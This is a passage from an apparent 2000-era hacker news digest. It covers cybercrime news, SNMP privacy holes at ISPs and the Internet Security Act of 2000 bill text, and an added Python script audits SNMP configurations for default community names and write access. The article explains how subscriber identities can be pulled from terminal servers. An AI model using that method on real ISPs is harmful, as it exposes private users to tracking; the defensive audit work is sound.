Malia said plans also are under way to establish a virtual nationwide network of training centers that offer information assurance courses. The courses would match a set of competencies for information assurance professionals that the Office of Personnel Management is developing.
The hope is that agencies would use these centers to keep their cybersecurity workers trained.

"If we don’t keep the skills of information assurance [workers] up-to-date, we are extremely vulnerable," Malia said.

The Cyber Services and virtual training network projects are dependent on fiscal 2001 funding to proceed, Malia said.

@HWA

89.0 [HNN] CalPoly Charges Student with Port Scanning
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by Zorro

The California Polytechnic State University has charged computer engineering sophomore Paul Reed with a violation of Title V of the California Code of Regulations. Mr. Reed was attempting to find a machine within a DHCP range that was located at a company he worked for off campus but he conducted his scan from his dorm room using the CalPoly computer network.

Free Paul
http://freepaul.org/

@HWA

90.0 [HNN] Encrypted Sheet Music Available on Net Soon
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 21st

contributed by root66

Net4music, which has been given access to one million of EMI's songs will start to post the sheet music to the Net by the end of April. Net4music will sell sheet music at $3.95 per download but will use a software lock to only allow five printouts of the music. (Five? All people need is one copy, and access to a photocopier.)

Wired
http://www.wired.com/news/culture/0,1284,35735,00.html

EMI Plays Along with Downloads

by Brad King
3:00 a.m. Apr. 19, 2000 PDT

Musicians who want to play along with Aerosmith, Lenny Kravitz, or The Counting Crows will soon have access to EMI Music Publishing's sheet music library online.

The subsidiary of the EMI music label on Tuesday said it will give digital rights management company Net4Music access to one million of the label's songs in exchange for a minority equity stake.

Net4Music will post 1,000 titles on its site by the end of April, and then will add 10,000 songs each month until 100,000 songs are posted.
This is the first time a major label has taken steps to have its entire catalog encoded and sold in digital format.

"This is a niche market for musicians and people who are looking for sheet music to play," said Martin Bandier, CEO of EMI Publishing. "It's tough to find a music store that sells sheet music. Now all you have to do is have a computer terminal."

Net4Music will offer single songs for $3.95 per copy, but the downloads will feature encryption that limits the number of printouts that can be made.

Similar types of digital encryption that limit the reuse of content after purchase, such as SDMI, InterTrust, and Sony's memory stick, have been failures with consumers. Meanwhile, other attempts at securing content, like Windows Media Audio, Liquid Audio, and e-books, have proven too easy to circumvent.

Francois DuLiege, CEO of Net4Music, said his encryption system will not discourage consumers.

"You will pay less for five copies of digital sheet music than you would for one copy of sheet music if you went to a retail store," he said. "Most songs in retail stores don't sell single sets of music, so you have to purchase the whole package. This, I believe, is much easier for consumers."

The major music labels have been slow to make recorded music and compositions available in digital form, but rights management company Sunhawk set a precedent by signing a deal in 1998 to digitize content from Warner Music's music catalog.

Sunhawk has been digitizing Warner's Christian music for two years, but has only digitized about 10,000 songs thus far, having branched out to encode and digitize other media beyond music.

EMI's Bandier believes the Net4Music deal will expand demand for EMI content.

"The Christian music business is a small homespun business that is dependent upon the congregation and others knowing all the lyrics to the music, so getting that content out there as quickly as possible was important," Bandier said. "But that only makes up about 5 percent of our business."

Sunhawk CEO Marlin Eller said the deal will only help move the music industry to embrace digital e-commerce.

"This validates exactly what we are trying to do digitally," Eller said. "Industry executives should learn to get off their butts and license their content. We haven't been seeing theft with this content so far. But (the reluctant labels) are allowing piracy to take place by not putting up a legitimate source of content."

@HWA

91.0 [HNN] ISPs Still Vulnerable to SNMP Holes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Javaman

While holes in SNMP are nothing new, it is surprising just how vulnerable some ISPs still are to the problem. Philtered.net says that now a malicious person could extract an ISP user's login name and phone number directly from the terminal server thereby equating an IP address with a real person.

Internet News
http://www.internetnews.com/isp-news/article/0,2171,8_344971,00.html

Philtered.net
http://www.philtered.net/

ISPs Battle Privacy Loophole

By Brian McWilliams

Internet service providers Thursday are being warned to batten down their network access servers against a familiar type of privacy attack that's making a comeback.

According to a bug-tracking group, so-called greyhat hackers say they have developed a Perl script that can quietly extract subscribers' phone numbers and log-in names directly off an ISP's terminal servers using the Simple Network Management Protocol (SNMP).

Philadelphia-based Philtered.Net is an online community that pursues their own venue of security-related technical projects. One of the group's hackers, who uses the handle "Lumpy," said an unauthorized person, armed with the script and an Internet user's IP address, can easily query a database on the ISP's access server.
According to Lumpy, it's easy to call the management information base of an ISP's access server and use standard SNMP commands to transform an anonymous IP address into the real-world coordinates of a live person.

"People usually think that their IP address is as far as a hacker could go to find out who they are," Lumpy said. "But a hacker has the ability to find out who they are through a server directory to discover a person's home phone numbers and full address."

Lumpy also works as a security consultant and authored the script for probing SNMP information. He recently posted the information and the script on the Bugtraq mailing list.

Lumpy said three major ISPs were vulnerable to the attack, but after being notified the firms took action and properly locked down their servers to prevent SNMP access.

Lumpy also claims that some ISPs have their servers configured to allow write access permissions to their MIBs and that he's been able to force dial-up users offline.

Jeff Case, president of SNMP.com, a Tennessee-based network management-consulting firm, said the unsecured nature of older versions of SNMP is common knowledge.

"The first version of SNMP is not secure and is subject to these sorts of attacks," Case said. "We've known about that since 1988 and a new version of SNMP was made available in 1998. It's been deployed to plug-up the security holes."

But Lumpy of Philtered.net said that most ISPs could prevent unauthorized access to their MIBs by properly configuring the hardware when technicians initially set up a network.

"The reason these holes exist is because people have not bothered to read the manual where it says in big letters 'change your community names and block off access to SNMP,' but some ISPs aren't wasting time reading manuals so this is what happens."

ISPs that want to determine if a SNMP privacy hole exists on their networks can check out the BugTraq advisory at SecurityFocus.com in order to tighten-up access to their networks.
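The fix quoted in the article above ("change your community names and block off access to SNMP"), plus the write-access problem it mentions, expressed as a configuration check. This is an added example, not code from the article, Philtered.net or the Bugtraq post; it assumes a Net-SNMP style snmpd.conf (the article names no product), and the sample configuration and the list of default names are constructed.

```python
import ipaddress
from typing import NamedTuple

# Well-known default community names (constructed, non-exhaustive list).
DEFAULT_COMMUNITIES = {"public", "private", "community", "snmp", "admin"}

COMMUNITY_DIRECTIVES = ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6")

# Constructed sample configuration, not taken from any real ISP.
SAMPLE_CONF = """\
# constructed sample for the audit below
rocommunity public
rwcommunity private 0.0.0.0/0
rocommunity n0c-Read-7f3a 192.0.2.0/24
com2sec -Cn ctx1 readonly default public
rwcommunity n0c-Write-91bd 192.0.2.10
syslocation pop-1
"""


class Finding(NamedTuple):
    line_no: int
    rule: str      # "default-community", "open-source" or "write-access"
    detail: str


def mask(community):
    """Show default names in full (they are public knowledge), hide the rest."""
    if community.lower() in DEFAULT_COMMUNITIES:
        return community
    return community[:2] + "***"


def is_open_source(source):
    """True when the source field does not narrow who may query the agent."""
    if source is None or source == "default":
        return True
    try:
        return ipaddress.ip_network(source, strict=False).prefixlen == 0
    except ValueError:
        return False  # hostname or other token: counted as a restriction


def parse_directive(tokens):
    """Return (community, source, writable) for a community directive, else None."""
    directive, args = tokens[0].lower(), tokens[1:]
    if directive in COMMUNITY_DIRECTIVES:
        if not args:
            return None
        source = args[1] if len(args) > 1 else None
        return args[0], source, directive.startswith("rw")
    if directive in ("com2sec", "com2sec6"):
        if len(args) >= 2 and args[0] == "-Cn":   # optional context prefix
            args = args[2:]
        if len(args) < 3:
            return None
        # com2sec SECNAME SOURCE COMMUNITY; write rights are granted by
        # separate access lines, which this check does not follow.
        return args[2], args[1], False
    return None


def audit_snmpd_conf(text):
    """Flag default community names, unrestricted sources and write access."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parsed = parse_directive(line.split())
        if parsed is None:
            continue
        community, source, writable = parsed
        shown = mask(community)
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append(Finding(line_no, "default-community",
                                    f"community '{shown}' is a well-known default"))
        if is_open_source(source):
            findings.append(Finding(line_no, "open-source",
                                    f"community '{shown}' accepts queries from any address"))
        if writable:
            findings.append(Finding(line_no, "write-access",
                                    f"community '{shown}' permits SET requests"))
    return findings


if __name__ == "__main__":
    for f in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {f.line_no}: [{f.rule}] {f.detail}")
```

A clean result here only covers the agent's own configuration; filtering SNMP at the network edge is a separate control the check cannot see.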
@HWA

92.0 [HNN] Internet Security Act of 2000
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

Senator Patrick Leahy has introduced into the Senate the Internet Security Act of 2000. The bill will give more leeway to law enforcement to use pen registers and trap and trace devices, remove the 'loophole' that prevents officers from monitoring an innocent-host computer without a wiretap order and contains provisions for equipment forfeiture. (This may be a little overreaction, seems like a lot of power granted law enforcement.)

S 2430 - via Cryptome
http://cryptome.org/s2430is.txt

[Congressional Record: April 13, 2000 (Senate)]
[Page S2729-S2771]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]
[DOCID:cr13ap00pt2-155]

STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS

[Excerpt]

By Mr. LEAHY:

S. 2430. A bill to combat computer hacking through enhanced law enforcement and to protect the privacy and constitutional rights of Americans, and for other purposes; to the Committee on the Judiciary.

Internet Security Act of 2000

Mr. LEAHY. Mr. President, as we head into the twenty-first century, computer-related crime is one of the greatest challenges facing law enforcement. Many of our critical infrastructures and our government depend upon the reliability and security of complex computer systems. We need to make sure that these essential systems are protected from all forms of attack. The legislation I am introducing today will help law enforcement investigate and prosecute those who jeopardize the integrity of our computer systems and the Internet.

Whether we work in the private sector or in government, we negotiate daily through a variety of security checkpoints designed to protect ourselves from being victimized by crime or targeted by terrorists.
For instance, congressional buildings like this one use cement pillars placed at entrances, photo identification cards, metal detectors, x-ray scanners, and security guards to protect the physical space. These security steps and others have become ubiquitous in the private sector as well.

Yet all these physical barriers can be circumvented using the wires that run into every building to support the computers and computer networks that are the mainstay of how we communicate and do business. This plain fact was amply demonstrated by the recent hacker attacks on E-Trade, ZDNet, Datek, Yahoo, eBay, Amazon.com and other Internet sites. These attacks raise serious questions about Internet security--questions that we need to answer to ensure the long-term stability of electronic commerce. More importantly, a well-focused and more malign cyber-attack on computer networks that support telecommunications, transportation, water supply, banking, electrical power and other critical infrastructure systems could wreak havoc on our national economy or even jeopardize our national defense. We have learned that even law enforcement is not immune. Just recently we learned of a denial of service attack successfully perpetrated against a FBI web site, shutting down that site for several hours.

The cybercrime problem is growing. The reports of the CERT Coordination Center (formerly called the ``Computer Emergency Response Team''), which was established in 1988 to help the Internet community detect and resolve computer security incidents, provide chilling statistics on the vulnerabilities of the Internet and the scope of the problem. Over the last decade, the number of reported computer security incidents grew from 6 in 1988 to more than 8,000 in 1999. But that alone does not reveal the scope of the problem.
According to CERT's most recent annual report, more than four million computer hosts were affected by the computer security incidents in 1999 alone by damaging computer viruses, with names like ``Melissa,'' ``Chernobyl,'' ``ExploreZip,'' and by the other ways that remote intruders have found to exploit system vulnerabilities. Even before the recent headline-grabbing ``denial-of-service'' attacks, CERT documented that such incidents ``grew at rate around 50% per year'' which was ``greater than the rate of growth of Internet hosts.''

CERT has tracked recent trends in severe hacking incidents on the Internet and made the following observations, First, hacking techniques are getting more sophisticated. That means law enforcement is going to have to get smarter too, and we need to give them the resources to do this. Second, hackers have ``become increasingly difficult to locate and identify.'' These criminals are operating in many different locations and are using techniques that allow them to operate in ``nearly total obscurity.''

We have been aware of the vulnerabilities to terrorist attacks of our computer networks for more than a decade. It became clear to me, when I chaired a series of hearings in 1988 and 1989 by the Subcommittee on Technology and the Law in the Senate Judiciary Committee on the subject of high-tech terrorism and the threat of computer viruses, that merely ``hardening'' our physical space from potential attack would only prompt committed criminals and terrorists to switch tactics and use new technologies to reach vulnerable softer targets, such as our computer systems and other critical infrastructures. The government has a responsibility to work with those in the private sector to assess those vulnerabilities and defend them. That means making sure our law enforcement agencies have the tools they need, but also that the government does not stand in the way of smart technical solutions to defend our computer systems.
Targeting cybercrime with up-to-date criminal laws and tougher law enforcement is only part of the solution. While criminal penalties may deter some computer criminals, these laws usually come into play too late, after the crime has been committed and the injury inflicted. We should keep in mind the adage that the best defense is a good offense. Americans and American firms must be encouraged to take preventive measures to protect their computer information and systems. Just recently, internet providers and companies such as Yahoo! and Amazon.com Inc., and computer hardware companies such as Cisco Systems Inc., proved successful at stemming attacks within hours thereby limiting losses.

That is why, for years, I have advocated and sponsored legislation to encourage the widespread use of strong encryption. Encryption is an important tool in our arsenal to protect the security of our computer information and networks. The Administration made enormous progress earlier this year when it issued new regulations relaxing export controls on strong encryption. Of course, encryption technology cannot be the sole source of protection for our critical computer networks and computer-based infrastructure, but we need to make sure the government is encouraging--and not restraining--the use of strong encryption and other technical solutions to protecting our computer systems.

Congress has responded again and again to help our law enforcement agencies keep up with the challenges of new crimes being executed over computer networks. In 1984, we passed the Computer Fraud and Abuse Act, and its amendments, to criminalize conduct when carried out by means of unauthorized access to a computer. In 1986, we passed the Electronic Communications Privacy Act (ECPA), which I was proud to sponsor, to criminalize tampering with electronic mail systems and remote data processing systems and to protect the privacy of computer users.
In the 104th Congress, Senators Kyl, Grassley, and I worked together to enact the National Information Infrastructure Protection Act to increase protection under federal criminal law for both government and private computers, and to address an emerging problem of computer-age blackmail in which a criminal threatens to harm or shut down a computer system unless their extortion demands are met.

In this Congress, I have introduced a bill with Senator DeWine, the Computer Crime Enforcement Act, S. 1314, to set up a $25 million grant program within the U.S. Department of Justice for states to tap for improved education, training, enforcement and prosecution of computer crimes. All 50 states have now enacted tough computer crime control laws. These state laws establish a firm groundwork for electronic commerce and Internet security. Unfortunately, too many state and local law enforcement agencies are struggling to afford the high cost of training and equipment necessary for effective enforcement of their state computer crime statutes. Our legislation, the Computer Crime Enforcement Act, would help state and local law enforcement join the fight to combat the worsening threats we face from computer crime.

Computer crime is a problem nationwide and in Vermont. I recently released a survey on computer crime in Vermont. My office surveyed 54 law enforcement agencies in Vermont--43 police departments and 11 State's attorney offices--on their experience investigating and prosecuting computer crimes. The survey found that more than half of these Vermont law enforcement agencies encounter computer crime, with many police departments and state's attorney offices handling 2 to 5 computer crimes per month.

Despite this documented need, far too many law enforcement agencies in Vermont cannot afford the cost of policing against computer crimes.
Indeed, my survey found that 98% of the responding Vermont law enforcement agencies do not have funds dedicated for use in computer crime enforcement.

My survey also found that few law enforcement officers in Vermont are properly trained in investigating computer crimes and analyzing cyber-evidence. According to my survey, 83% of responding law enforcement agencies in Vermont do not employ officers properly trained in computer crime investigative techniques. Moreover, my survey found that 52% of the law enforcement agencies that handle one or more computer crimes per month cited their lack of training as a problem encountered during investigations. Proper training is critical to ensuring success in the fight against computer crime.

This bill will help our computer crime laws up to date as an important backstop and deterrent. I believe that our current computer crime laws can be enhanced and that the time to act is now. We should pass legislation designed to improve our law enforcement efforts while at the same time protecting the privacy rights of American citizens.

The bill I offer today will make it more efficient for law enforcement to use tools that are already available--such as pen registers and trap and trace devices--to track down computer criminals expeditiously. It will ensure that law enforcement can investigate and prosecute hacker attacks even when perpetrators use foreign-based computers to facilitate their crimes. It will implement criminal forfeiture provisions to ensure that cybercriminals are forced to relinquish the tools of their trade upon conviction. It will also close a current loophole in our wiretap laws that prevents a law enforcement officer from monitoring an innocent-host computer with the consent of the computer's owner and without a wiretap order to track down the source of denial-of-service attacks.
Finally, this legislation will assist state and local police departments in their parallel efforts to combat cybercrime, in recognition of the fact that this fight is not just at the federal level.

The key provisions of the bill are:

Jurisdictional and Definitional Changes to the Computer Fraud and Abuse Act: The Computer Fraud and Abuse Act, 18 U.S.C. Sec. 1030, is the primary federal criminal statute prohibiting computer frauds and hacking. This bill would amend the statute to clarify the appropriate scope of federal jurisdiction. First, the bill adds a broad definition of ``loss'' to the definitional section. Calculation of loss is important both in determining whether the $5,000 jurisdictional hurdle in the statute is met, and, at sentencing, in calculating the appropriate guideline range and restitution amount.

Second, the bill amends the definition of ``protected computer,'' to expressly include qualified computers even when they are physically located outside of the United States. This clarification will preserve the ability of the United States to assist in international hacking cases. A ``Sense of Congress'' provision specifies that federal jurisdiction is justified by the ``interconnected and interdependent nature of computers used in interstate or foreign commerce.''

Finally, the bill expands the jurisdiction of the United States Secret Service to encompass investigations of all violations of 18 U.S.C. Sec. 1030. Prior to the 1996 amendments to the Computer Fraud and Abuse Act, the Secret Service was authorized to investigate any and all violations of section 1030, pursuant to an agreement between the Secretary of Treasury and the Attorney General. The 1996 amendments, however, concentrated Secret Service jurisdiction on certain specified subsections of section 1030.
The current amendment would return full jurisdiction to the Secret Service and would allow the Justice and Treasury Departments to decide on the appropriate work-sharing balance between the two.

Elimination of Mandatory Minimum Sentence for Certain Violations of Computer Fraud and Abuse Act: Currently, a directive to the Sentencing Commission requires that all violations, including misdemeanor violations, of certain provisions of the Computer Fraud and Abuse Act be punished with a term of imprisonment of at least six months. The bill would change this directive to the Sentencing Commission so that no such mandatory minimum would be required.

Additional Criminal Forfeiture Provisions: The bill adds a criminal forfeiture provision to the Computer Fraud and Abuse Act, requiring forfeiture of physical property used in or to facilitate the offense as well as property derived from proceeds of the offense. It also supplements the current forfeiture provision in 18 U.S.C. 2318, which prohibits trafficking in, among other things, counterfeit computer program documentation and packaging, to require the forfeiture of replicators and other devices used in the production of such counterfeit items.

Pen Registers and Trap and Trace Devices: The bill makes it easier for law enforcement to use these investigative techniques in the area of cybercrime, and institutes corresponding privacy protections. On the law enforcement side, the bill gives nationwide effect to pen register and trap and trace orders obtained by Government attorneys, thus obviating the need to obtain identical orders in multiple federal jurisdictions. It also clarifies that such devices can be used on all electronic communication lines, not just telephone lines. On the privacy side, the bill provides for greater judicial review of applications for pen registers and trap and trace devices and institutes a minimization requirement for the use of such devices.
The bill also amends the reporting requirements for applications for such devices by specifying the information to be reported.

Denial of Service Investigations: Currently, a person whose computer is accessed by a hacker as a means for the hacker to reach a third computer cannot simply consent to law enforcement monitoring of his computer. Instead, because this person is not technically a party to the communication, law enforcement needs wiretap authorization under Title III to conduct such monitoring. The bill will close this loophole by explicitly permitting such monitoring without a wiretap if prior consent is obtained from the person whose computer is being hacked through and used to send ``harmful interference to a lawfully operating computer system.''

Encryption Reporting: The bill directs the Attorney General to report the number of wiretap orders in which encryption was encountered and whether such encryption precluded law enforcement from obtaining the plaintext of intercepted communications.

State and Local Computer Crime Enforcement: The bill directs the Office of Federal Programs to make grants to assist State and local law enforcement in the investigation and prosecution of computer crime.

Legislation must be balanced to protect our privacy and other constitutional rights. I am a strong proponent of the Internet and a defender of our constitutional rights to speak freely and to keep private our confidential affairs from either private sector snoops or unreasonable government searches. These principles can be respected at the same time we hold accountable those malicious mischief makers and digital graffiti sprayers, who use computers to damage or destroy the property of others. I have seen Congress react reflexively in the past to address concerns over anti-social behavior on the Internet with legislative proposals that would do more harm than good.
A good example of this is the Communications Decency Act, which the Supreme Court declared unconstitutional. We must make sure that our legislative efforts are precisely targeted on stopping destructive acts and that we avoid scattershot proposals that would threaten, rather than foster, electronic commerce and sacrifice, rather than promote, our constitutional rights. Technology has ushered in a new age filled with unlimited potential for commerce and communications. But the Internet age has also ushered in new challenges for federal, state and local law enforcement officials. Congress and the Administration need to work together to meet these new challenges while preserving the benefits of our new era. The legislation I offer today is a step in that direction. Mr. President, I ask unanimous consent that the text of the bill be printed in the Record. There being no objection, the bill was ordered to be printed in the Record, as follows: S. 2430 Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled, SECTION 1. SHORT TITLE. This Act may be cited as the ``Internet Security Act of 2000''. SEC. 2. AMENDMENTS TO THE COMPUTER FRAUD AND ABUSE ACT. 
Section 1030 of title 18, United States Code, is amended-- (1) in subsection (a)-- (A) in paragraph (5)-- (i) by inserting ``(i)'' after ``(A)'' and redesignating subparagraphs (B) and (C) as clauses (ii) and (iii), respectively; (ii) in subparagraph (A)(iii), as redesignated, by adding ``and'' at the end; and (iii) by adding at the end the following: ``(B) the conduct described in clause (i), (ii), or (iii) of subparagraph (A)-- ``(i) caused loss aggregating at least $5,000 in value during a 1-year period to 1 or more individuals; ``(ii) modified or impaired, or potentially modified or impaired, the medical examination, diagnosis, treatment, or care of 1 or more individuals; ``(iii) caused physical injury to any person; or ``(iv) threatened public health or safety;''; and (B) in paragraph (6), by adding ``or'' at the end; (2) in subsection (c)-- (A) in paragraph (2)-- (i) in subparagraph (A), by striking ``and'' at the end; and (ii) in subparagraph (B), by inserting ``or an attempted offense'' after ``in the case of an offense''; and (B) by adding at the end the following: ``(4) forfeiture to the United States in accordance with subsection (i) of the interest of the offender in-- ``(A) any personal property used or intended to be used to commit or to facilitate the commission of the offense; and ``(B) any property, real or personal, that constitutes or that is derived from proceeds traceable to any violation of this section.''; (3) in subsection (d)-- (A) by striking ``subsections (a)(2)(A), (a)(2)(B), (a)(3), (a)(4), (a)(5), and (a)(6) of''; and (B) by striking ``which shall be entered into by'' and inserting ``between''; (4) in subsection (e)-- (A) in paragraph (2)(B), by inserting ``, including computers located outside the United States'' before the semicolon; (B) in paragraph (4), by striking the period at the end and inserting a semicolon; (C) in paragraph (7), by striking ``and'' at the end; (D) in paragraph (8), by striking ``, that'' and all that follows 
through ``; and'' and inserting a semicolon; (E) in paragraph (9), by striking the period at the end and inserting ``; and''; and (F) by adding at the end the following: ``(10) the term `loss' includes-- ``(A) the reasonable costs to any victim of-- ``(i) responding to the offense; ``(ii) conducting a damage assessment; and ``(iii) restoring the system and data to their condition prior to the offense; and ``(B) any lost revenue or costs incurred by the victim as a result of interruption of service.''; (5) in subsection (g), by striking ``Damages for violations involving damage as defined in subsection (c)(8)(A)'' and inserting ``losses specified in subsection (a)(5)(B)(i)''; and (6) by adding at the end the following: ``(i) Provisions Governing Forfeiture.--Property subject to forfeiture under this section, any seizure and disposition thereof, and any administrative or judicial proceeding in relation thereto, shall be governed by subsection (c) and subsections (e) through (p) of section 413 of the Comprehensive Drug Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''. SEC. 3. SENSE OF CONGRESS. 
It is the sense of Congress that-- (1) acts that damage or attempt to damage computers used in the delivery of critical infrastructure services such as telecommunications, energy, transportation, banking and financial services, and emergency and government services pose a serious threat to public health and safety and cause or have the potential to cause losses to victims that include costs of responding to offenses, conducting damage assessments, and restoring systems and data to their condition prior to the offense, as well as lost revenue and costs incurred as a result of interruptions of service; and (2) the Federal Government should have jurisdiction to investigate acts affecting protected computers, as defined in section 1030(e)(2)(B) of title 18, United States Code, as amended by this Act, even if the effects of such acts occur wholly outside the United States, as in such instances a sufficient Federal nexus is conferred through the interconnected and interdependent nature of computers used in interstate or foreign commerce or communication. SEC. 4. MODIFICATION OF SENTENCING COMMISSION DIRECTIVE. Pursuant to its authority under section 994(p) of title 28, United States Code, the United States Sentencing Commission shall amend the Federal sentencing guidelines to ensure that any individual convicted of a violation of paragraph (4) or (5) of section 1030(a) of title 18, United States Code, can be subjected to appropriate penalties, without regard to any mandatory minimum term of imprisonment. SEC. 5. FORFEITURE OF DEVICES USED IN COMPUTER SOFTWARE COUNTERFEITING. 
Section 2318(d) of title 18, United States Code, is amended by-- (1) inserting ``(1)'' before ``When''; (2) inserting ``, and any replicator or other device or thing used to copy or produce the computer program or other item to which the counterfeit label was affixed, or was intended to be affixed'' before the period; and (3) by adding at the end the following: ``(2) The forfeiture of property under this section, including any seizure and disposition of the property, and any related judicial or administrative proceeding, shall be governed by the provisions of section 413 (other than subsection (d) of that section) of the Comprehensive Drug Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''. SEC. 6. CONFORMING AMENDMENT. Section 492 of title 18, United States Code, is amended by striking ``or 1720,'' and inserting ``, 1720, or 2318''. SEC. 7. PEN REGISTERS AND TRAP AND TRACE DEVICES. Section 3123 of title 18, United States Code is amended-- (1) by striking subsection (a) and inserting the following: ``(a) Issuance of Order.-- ``(1) Requests from attorneys for the government.--Upon an application made under section 3122(a)(1), the court may enter an ex parte order authorizing the installation and use of a pen register or a trap and trace device if the court finds, based on the certification by the attorney for the Government, that the information likely to be obtained by such installation and use is relevant to an ongoing criminal investigation. Such order shall apply to any entity providing wire or electronic communication service in the United States whose assistance is necessary to effectuate the order. 
``(2) Requests from state investigative or law enforcement officers.--Upon an application made under section 3122(a)(2), the court may enter an ex parte order authorizing the installation and use of a pen register or a trap and trace device within the jurisdiction of the court, if the court finds, based on the certification by the State law enforcement or investigative officer, that the information likely to be obtained by such installation and use is relevant to an ongoing criminal investigation.''; and (2) in subsection (b)-- (A) in paragraph (1)-- (i) in subparagraph (C), by inserting ``authorized under subsection (a)(2)'' after ``in the case of a trap and trace device''; and (ii) in subparagraph (D), by striking ``and'' at the end; (B) in paragraph (2), by striking the period at the end and inserting ``; and''; and (C) by adding at the end the following: ``(3) shall direct that the use of the pen register or trap and trace device be conducted in such a way as to minimize the recording or decoding of any electronic or other impulses that are not related to the dialing and signaling information utilized in processing by the service provider upon whom the order is served.''. SEC. 8. TECHNICAL AMENDMENTS TO PEN REGISTER AND TRAP AND TRACE PROVISIONS. (a) Issuance of an Order.--Section 3123 of title 18, United States Code, is amended-- (1) by inserting ``or other facility'' after ``line'' each place that term appears; (2) by inserting ``or applied'' after ``attached'' each place that term appears; (3) in subsection (b)(1)(C), by inserting ``or other identifier'' after ``the number''; and (4) in subsection (d)(2), by striking ``who has been ordered by the court'' and inserting ``who is obligated by the order''. 
(b) Definitions.--Section 3127 of title 18, United States Code is amended-- (1) by striking paragraph (3) and inserting the following: ``(3) the term `pen register'-- ``(A) means a device or process that records or decodes electronic or other impulses that identify the telephone numbers or electronic address dialed or otherwise transmitted by an instrument or facility from which a wire or electronic communication is transmitted and used for purposes of identifying the destination or termination of such communication by the service provider upon which the order is served; and ``(B) does not include any device or process used by a provider or customer of a wire or electronic communication service for billing, or recording as an incident to billing, for communications services provided by such provider or any device or process by a provider or customer of a wire communication service for cost accounting or other like purposes in the ordinary course of its business;''; and (2) in paragraph (4)-- (A) by inserting ``or process'' after ``means a device''; (B) by inserting ``or other identifier'' after ``number''; and (C) by striking ``or device'' and inserting ``or other facility''. SEC. 9. PEN REGISTER AND TRAP AND TRACE REPORTS. Section 3126 of title 18, United States Code, is amended by inserting before the period at the end the following: ``, which report shall include information concerning-- ``(1) the period of interceptions authorized by the order, and the number and duration of any extensions of the order; ``(2) the offense specified in the order or application, or extension of an order; ``(3) the number of investigations involved; ``(4) the number and nature of the facilities affected; and ``(5) the identity, including district, of the applying investigative or law enforcement agency making the application and the person authorizing the order''. SEC. 10. ENHANCED DENIAL OF SERVICE INVESTIGATIONS. 
Section 2511(2)(c) of title 18, United States Code, is amended to read as follows: ``(c)(i) It shall not be unlawful under this chapter for a person acting under color of law to intercept a wire, oral, or electronic communication, if such person is a party to the communication or 1 of the parties to the communication has given prior consent to such interception. ``(ii) It shall not be unlawful under this chapter for a person acting under color of law to intercept a wire or electronic communication, if-- ``(I) the transmission of the wire or electronic communication is causing harmful interference to a lawfully operating computer system; ``(II) any person who is not a provider of service to the public and who is authorized to use the facility from which the wire or electronic communication is to be intercepted has given prior consent to the interception; and ``(III) the interception is conducted only to the extent necessary to identify the source of the harmful interference described in subclause (I).''. SEC. 11. ENCRYPTION REPORTING REQUIREMENTS. Section 2519(2)(b) of title 18, United States Code, is amended by striking ``and (iv)'' and inserting ``(iv) the number of orders in which encryption was encountered and whether such encryption prevented law enforcement from obtaining the plain text of communications intercepted pursuant to such order, and (v)''. SEC. 12. STATE AND LOCAL COMPUTER CRIME ENFORCEMENT. 
(a) In General.--Subject to the availability of amounts provided in advance in appropriations Acts, the Assistant Attorney General for the Office of Justice Programs of the Department of Justice shall make a grant to each State, which shall be used by the State, in conjunction with units of local government, State and local courts, other States, or combinations thereof, to-- (1) assist State and local law enforcement in enforcing State and local criminal laws relating to computer crime; (2) assist State and local law enforcement in educating the public to prevent and identify computer crime; (3) assist in educating and training State and local law enforcement officers and prosecutors to conduct investigations and forensic analyses of evidence and prosecutions of computer crime; (4) assist State and local law enforcement officers and prosecutors in acquiring computer and other equipment to conduct investigations and forensic analysis of evidence of computer crimes; and (5) facilitate and promote the sharing of Federal law enforcement expertise and information about the investigation, analysis, and prosecution of computer crimes with State and local law enforcement officers and prosecutors, including the use of multijurisdictional task forces. 
(b) Use of Grant Amounts.--Grants under this section may be used to establish and develop programs to-- (1) assist State and local law enforcement agencies in enforcing State and local criminal laws relating to computer crime; (2) assist State and local law enforcement agencies in educating the public to prevent and identify computer crime; (3) educate and train State and local law enforcement officers and prosecutors to conduct investigations and forensic analyses of evidence and prosecutions of computer crime; (4) assist State and local law enforcement officers and prosecutors in acquiring computer and other equipment to conduct investigations and forensic analysis of evidence of computer crimes; and (5) facilitate and promote the sharing of Federal law enforcement expertise and information about the investigation, analysis, and prosecution of computer crimes with State and local law enforcement officers and prosecutors, including the use of multijurisdictional task forces. (c) Assurances.--To be eligible to receive a grant under this section, a State shall provide assurances to the Attorney General that the State-- (1) has in effect laws that penalize computer crime, such as penal laws prohibiting-- (A) fraudulent schemes executed by means of a computer system or network; (B) the unlawful damaging, destroying, altering, deleting, removing of computer software, or data contained in a computer, computer system, computer program, or computer network; or (C) the unlawful interference with the operation of or denial of access to a computer, computer program, computer system, or computer network; (2) an assessment of the State and local resource needs, including criminal justice resources being devoted to the investigation and enforcement of computer crime laws; and (3) a plan for coordinating the programs funded under this section with other federally funded technical assistant and training programs, including directly funded local programs such as the Local Law 
